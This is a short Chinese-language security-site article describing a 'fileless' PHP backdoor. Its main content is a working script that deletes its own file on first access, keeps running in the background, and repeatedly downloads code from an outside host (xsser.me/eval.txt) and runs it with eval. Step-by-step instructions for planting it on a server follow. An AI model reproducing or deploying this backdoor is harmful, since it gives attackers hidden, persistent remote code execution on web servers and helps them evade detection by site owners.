热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

PHP 无文件后门

发布时间:2013-10-12 14:34文章来源:网络文章作者:Sogili 点击次数:
摘要:PHP 无文件后门的意思是驻在 php 后台中的 shell。 nonshell.php ? php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $ remote_file = 'http://xsser.me/eval.txt' ; while($ code = file_get_contents ($remote_file...

PHP 无文件后门的意思是驻在 php 后台中的 shell。

nonshell.php

 

  1. <?php 
  2. unlink($_SERVER['SCRIPT_FILENAME']); 
  3. ignore_user_abort(true); 
  4. set_time_limit(0); 
  5.  
  6. $remote_file = 'http://xsser.me/eval.txt'
  7. while($code = file_get_contents($remote_file)){ 
  8. @eval($code); 
  9. sleep(5); 
  10. }; 
  11. ?> 

eval.txt

file_put_contents('1.txt','hello world '.time());

使用方式

将 nonshell.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。

停止执行

删除或清空 eval.txt。

缺点

服务器或WEB容器一重启后门就没了。

标签分类:

上一篇:利用IIS漏洞 突破安全狗上传后门
下一篇:一句话木马及其正则检测